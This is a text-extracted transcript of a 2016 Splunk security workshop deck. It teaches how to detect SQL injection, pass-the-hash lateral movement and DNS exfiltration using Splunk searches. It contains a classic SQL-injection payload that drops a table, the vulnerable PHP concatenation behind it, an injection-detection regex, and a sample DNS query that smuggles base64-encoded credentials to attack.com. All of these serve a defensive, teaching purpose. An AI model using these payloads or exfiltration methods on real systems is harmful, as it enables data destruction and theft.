Splunk Enterprise for InfoSec Hands-On
-
Upload
splunk -
Category
Technology
-
view
146 -
download
6
Transcript of Splunk Enterprise for InfoSec Hands-On
1
Aquarius – 01Pisces (A~M)– 02Pisces (N~Z)– 03Aries – 04Taurus (A~M)– 05Taurus (N~Z)– 06Gemini (A~M)– 07
Gemini (N~Z)– 08Cancer (A~M)– 09Cancer (N~Z)– 10Leo– 11Virgo (A~M)– 12Virgo (N~Z)– 13Libra(A~M)– 14
Libra(N~Z)– 15Scorpio (A~M)– 16Scorpio (N~Z)– 17Sagittarius – 18Capricorn (A~M)– 19Capricorn (N~Z)– 20
https://od-splunklivesantaclara-XX.splunkoxygen.comUsername:splunklive Password:security
SecurityHands-On:What’sYourSign?
Copyright©2016SplunkInc.
SplunkEnterpriseforInformationSecurity
Hands-OnSantaClara|November10,2016
Presenters:ChrisShobert &LilyLee
3
SafeHarborStatementDuringthecourseofthispresentation,wemaymakeforward-lookingstatementsregardingfutureeventsortheexpectedperformanceofthecompany.Wecautionyouthatsuchstatementsreflectourcurrentexpectations and estimates basedonfactorscurrentlyknowntousandthatactualeventsorresultscoulddiffermaterially.Forimportantfactorsthatmaycauseactualresultstodifferfromthosecontainedinourforward-lookingstatements,pleasereviewourfilings withtheSEC. Theforward-lookingstatementsmadeinthispresentationarebeingmadeasofthetimeanddateofitslivepresentation. If reviewedafter itslivepresentation, thispresentationmaynotcontaincurrentoraccurateinformation. Wedonotassumeanyobligationtoupdateanyforward-lookingstatementswe may make. Inaddition,anyinformationaboutour roadmapoutlinesourgeneralproductdirectionandissubjecttochangeatanytimewithoutnotice. It isforinformationalpurposesonlyandshallnot beincorporatedintoanycontractorothercommitment. Splunkundertakesnoobligationeithertodevelopthefeaturesorfunctionalitydescribed ortoincludeanysuchfeatureorfunctionalityinafuturerelease.
4
Agenda
Intro
WebAttacks
LateralMovement
DNSExfiltration
Wrap-up/Q&A
Copyright©2016SplunkInc.
Intro
Machinedatacontainsadefinitiverecordofallinteractions
Splunkisaveryeffectiveplatformtocollect,store,andanalyzeallofthatdata
Human Machine
Machine Machine
MainframeData
PlatformforMachineData
SplunkSolutions>EasytoAdopt
RelationalDatabases MobileForwarders Syslog/
TCP/OtherSensors&ControlSystems
AcrossDataSources,UseCases&ConsumptionModels
WireData
SplunkPremiumSolutions&Apps RichEcosystemofApps
VMware Exchange PCISecurity
ITSI
ITSvcInt
UBA
UBA Cisco PAN SNOW AWS
SplunkPositionedasa LeaderinGartner2016MagicQuadrantforSecurityInformationandEventManagement*
*Gartner,Inc.,2016MagicQuadrantforSecurityInformationandEventManagement,andCriticalCapabilitiesforSecurityInformationandEventManagement,OliverRochford,KellyM.Kavanagh,TobyBussa.10August2016ThisgraphicwaspublishedbyGartner,Inc.aspartofalargerresearchdocumentandshouldbeevaluatedinthecontextoftheentiredocument.TheGartnerdocumentisavailableuponrequestfromSplunk.Gartnerdoesnotendorseanyvendor,productorservicedepictedinitsresearchpublications,anddoesnotadvisetechnologyuserstoselectonlythosevendorswith thehighestratingsorotherdesignation.GartnerresearchpublicationsconsistoftheopinionsofGartner'sresearchorganizationandshouldnotbeconstruedasstatementsoffact.Gartnerdisclaimsallwarranties,expressedorimplied, withrespecttothisresearch,includinganywarrantiesofmerchantabilityorfitnessforaparticularpurpose.
Ø Fouryearsinarowasaleader
Ø FurthestoverallinCompletenessofVision
Ø Splunkalsoscoreshighestin2016CriticalCapabilitiesforSIEMreportinallthreeusecases
9
GartnerCriticalCapabilitiesforSIEM
9
*Gartner,Inc.,2016MagicQuadrantforSecurityInformationandEventManagement,andCriticalCapabilitiesforSecurityInformationandEventManagement,OliverRochford,KellyM.Kavanagh,TobyBussa.10August2016ThisgraphicwaspublishedbyGartner,Inc.aspartofalargerresearchdocumentandshouldbeevaluatedinthecontextoftheentiredocument.TheGartnerdocumentisavailableuponrequestfromSplunk.Gartnerdoesnotendorseanyvendor,productorservicedepictedinitsresearchpublications,anddoesnotadvisetechnologyuserstoselectonlythosevendorswith thehighestratingsorotherdesignation.GartnerresearchpublicationsconsistoftheopinionsofGartner'sresearchorganizationandshouldnotbeconstruedasstatementsoffact.Gartnerdisclaimsallwarranties,expressedorimplied, withrespecttothisresearch,includinganywarrantiesofmerchantabilityorfitnessforaparticularpurpose.
1.BasicSecurityMonitoring 2.AdvancedThreatDetection 3.Forensics&IncidentResponse
Copyright©2016SplunkInc.
WebAttacks
11
OWASP2013Top10[10]Unvalidated redirectsandforwards[9]Usingcomponentswithknownvulnerabilities[8]Cross-siterequestforgery[7]Missingfunctionlevelaccesscontrol[6]Sensitivedataexposure[5]Securitymisconfiguration[4]Insecuredirectobjectreference[3]Cross-sitescripting(XSS)[2]Brokenauthenticationandsessionmanagement
12
[1]InjectionSQLinjectionCodeinjectionOScommandingLDAPinjectionXMLinjectionXPath injectionSSIinjectionIMAP/SMTPinjectionBufferoverflow
WhydidIgetbreached?
SQLi hasbeenaroundavery,verylongtime…
13
Source:Imperva WebAttacksReport,2015
14
TalkTalk:PII/financialdatafor4McustomersVTech:PIIfor5Madults+kids
15
…andsofarthisyear…45
16
LittleBobbyTables
17
WhyDidBobby’sSchoolLoseTheirRecords?
$sql = "INSERT INTO Students (Name) VALUES ('" . $studentName . "');";
execute_sql($sql);
$studentName
1
2
18
INSERT INTO Students (Name) VALUES ('John');
WhyDidBobby’sSchoolLoseTheirRecords?
John
$studentName
19
WhyDidBobby’sSchoolLoseTheirRecords?
Robert'); DROP TABLE Students;--
INSERT INTO Students (Name) VALUES ('Robert'); DROP TABLE Students;--');
Let’sgethands-on!
21
Aquarius – 01Pisces (A~M)– 02Pisces (N~Z)– 03Aries – 04Taurus (A~M)– 05Taurus (N~Z)– 06Gemini (A~M)– 07
Gemini (N~Z)– 08Cancer (A~M)– 09Cancer (N~Z)– 10Leo– 11Virgo (A~M)– 12Virgo (N~Z)– 13Libra(A~M)– 14
Libra(N~Z)– 15Scorpio (A~M)– 16Scorpio (N~Z)– 17Sagittarius – 18Capricorn (A~M)– 19Capricorn (N~Z)– 20
https://od-splunklivesantaclara-XX.splunkoxygen.comUsername:splunklive Password:security
SecurityHands-On:What’sYourSign?
22
ALittleAboutOurEnvironmentOurlearningenvironmentconsistsof ~5.5Mevents,fromrealenvironments,butsanitized:
• WindowsSecurityevents• Apachewebaccesslogs• BroDNS&HTTP• PaloAltotrafficlogs• Someothervariousbits
23
OR
AreYouaNewbieorNinja?
Let’sgethands-on!
WebAttacks
25
https://splunkbase.splunk.com/app/1528/
SearchforpossibleSQLinjectioninyourevents:ü looksforpatternsinURIqueryfieldtoseeif
anyonehasinjectedthemwithSQLstatements
ü usestandarddeviationsthatare2.5timesgreaterthantheaveragelengthofyourURIqueryfield
Macrosused• sqlinjection_pattern(sourcetype,uri queryfield)• sqlinjection_stats(sourcetype,uri queryfield)
26
`sqlinjection_rex`isasearchmacro.Itcontains:
(?<injection>(?i)select.*?from|union.*?select|\'$|delete.*?from|update.*?set|alter.*?table|([\%27|\'](%20)*=(%20)*[\%27|\'])|\w*[%27|\']or)
Whichmeans:Inthestringwearegiven,lookforANY ofthefollowingmatchesandputthatintothe“injection”field.AnythingcontainingSELECTfollowedbyFROMAnythingcontainingUNIONfollowedbySELECTAnythingwitha‘attheendAnythingcontainingDELETEfollowedbyFROMAnythingcontainingUPDATEfollowedbySETAnythingcontainingALTERfollowedbyTABLEA%27ORa‘andthena%20andanyamountofcharactersthena%20andthena%27ORa‘
Note:%27isencoded“’”and%20isencoded<space>Anyamountofwordcharactersfollowedbya%27ORa‘andthen“or”
RegularExpressionsFTW
27
Bonus:TryouttheSQLInjectionSearch app!
28
Summary:WebAttacks/SQLInjectionSQLinjectionprovideattackerswitheasyaccesstodataDetectingadvancedSQLinjectionishard– useanapp!UnderstandwhereSQLi ishappeningonyournetworkandputastoptoitAugmentyourWAFwithenterprise-wideSplunksearches
Copyright©2016SplunkInc.
LateralMovement
30
PokingAround
Anattackerhacksanon-privilegedusersystem.
Sowhat?
31
LateralMovement
LateralMovementistheexpansionofsystemscontrolled,anddataaccessed.
32
MostFamousLateralMovementAttack?(excludingpasswordre-use)
PasstheHash!
33
ThisandothertechniquesusedindestructiveSands breach…
…andatSony,too.
34
DetectingLegacyPtHLookforWindowsEvents:EventID:4624or4625Logontype:3Auth package:NTLMUseraccountisnotadomainlogon,orAnonymousLogon
…thisistriviallyeasyinSplunk
Let’sgethands-on!
LateralMovement:Legacy
36
ThenItGotHarderPasstheHashtoolshaveimprovedTrackingofjitter,othermetricsSolet’sdetectlateralmovementdifferently
37
NetworkTrafficProvidesSourceofTruthIusuallytalkto10hostsThenonedayItalkto10,000hostsALARM!
Let’sgethands-on!
LateralMovement:NetworkTraffic
39
iz sohard…uhazmagic?
40
izsohard…uhazmagic?Comesee…
atthedemobooths
UBA
41
Summary:LateralMovementAttackersuccessdefinesscopeofabreachHighdifficulty,highimportanceWorthdoinginSplunkEasywithUBA
Copyright©2016SplunkInc.
DNSExfiltration
43
domain=corp;user=dave;password=12345
encrypt
DNSQuery:ZG9tYWluPWNvcnA7dXNlcj1kYXZlO3Bhc3N3b3JkPTEyMzQ1DQoNCg==.attack.com
ZG9tYWluPWNvcnA7dXNlcj1kYXZlO3Bhc3N3b3JkPTEyMzQ1DQoNCg==
44
DNSexfil tendstobeoverlookedwithinanoceanofDNSdata.
Let’sfixthat!
DNSExfiltration
45
FrameworkPOS:acard-stealingprogramthatexfiltrates datafromthetarget’snetworkbytransmittingitasdomainnamesystem(DNS)traffic
Butthebigdifferenceisthewayhowstolendataisexfiltrated:themalwareusedDNSrequests!https://blog.gdatasoftware.com/2014/10/23942-new-frameworkpos-
variant-exfiltrates-data-via-dns-requests
“”
…feworganizationsactuallykeepdetailedlogsorrecordsof theDNStraffictraversingtheirnetworks— makingitanidealwaytosiphondatafromahackednetwork.
http://krebsonsecurity.com/2015/05/deconstructing-the-2014-sally-beauty-breach/#more-30872
“”
DNSExfiltration
46
https://splunkbase.splunk.com/app/2734/
DNSexfil detection– tricksofthetradeü parseURLs&complicatedTLDs(TopLevelDomain)ü calculateShannonEntropy
Listofprovidedlookups• ut_parse_simple(url)• ut_parse(url,list)orut_parse_extended(url,list)• ut_shannon(word)• ut_countset(word,set)• ut_suites(word,sets)• ut_meaning(word)• ut_bayesian(word)• ut_levenshtein(word1,word2)
47
Examples• Thedomainaaaaa.com hasaShannonEntropyscoreof1.8 (verylow)• Thedomaingoogle.com hasaShannonEntropyscoreof2.6 (ratherlow)• A00wlkj—(-a.aslkn-C.a.2.sk.esasdfasf1111)-890209uC.4.com hasaShannon
Entropyscoreof3 (ratherhigh)
Layman’sdefinition:ascorereflectingtherandomness ormeasureofuncertainty ofastring
ShannonEntropy
48
DetectingDataExfiltration
index=brosourcetype=bro_dns|`ut_parse(query)`|`ut_shannon(ut_subdomain)`|eval sublen =length(ut_subdomain)|tableut_domain ut_subdomainut_shannon sublen
TIPSq LeverageourBroDNSdataq CalculateShannonEntropyscoresq Calculatesubdomainlengthq DisplayDetails
Let’sgethands-on!
LateralMovement:DNSExfiltration
50
DetectingDataExfiltration
…|statscountavg(ut_shannon)asavg_shaavg(sublen)asavg_sublenstdev(sublen)asstdev_sublenbyut_domain|searchavg_sha>3avg_sublen>20stdev_sublen<2
TIPSq LeverageourBroDNSdataq CalculateShannonEntropyscoresq Calculatesubdomainlengthq Displaycount,scores,lengths,
deviations
51
DetectingDataExfiltrationRESULTS• Exfiltrating datarequiresmanyDNSrequests– lookforhighcounts• DNSexfiltrationtomooo.com and chickenkiller.com
52
Summary:DNSExfiltrationExfiltrationbyDNSandICMPisaverycommontechniqueManyorganizationsdonotanalyzeDNSactivity– donotbelikethem!NoDNSlogs?NoSplunk Stream?LookatFWbytecounts
Copyright©2016SplunkInc.
Wrap-up/Q&A
54
SummaryMultiplephasestomodernattacksDeploydetectionacrossallphasesAlsoconsideradaptiveresponse!Stayabreastofmodernadvancements
Today’scontent(PDF):
https://splunk.box.com/v/SplunkLive-Security-Handout
• 5,000+ITandBusinessProfessionals• 175+Sessions• 80+CustomerSpeakers
PLUSSplunk University• Threedays:Sept23-25,2017• GetSplunk CertifiedforFREE!• GetCPEcreditsforCISSP,CAP,SSCP
SEPT25-28,2017WalterE.WashingtonConventionCenterWashington,D.C.CONF.SPLUNK.COM
The8th AnnualSplunkWorldwideUsers’Conference
ThankYou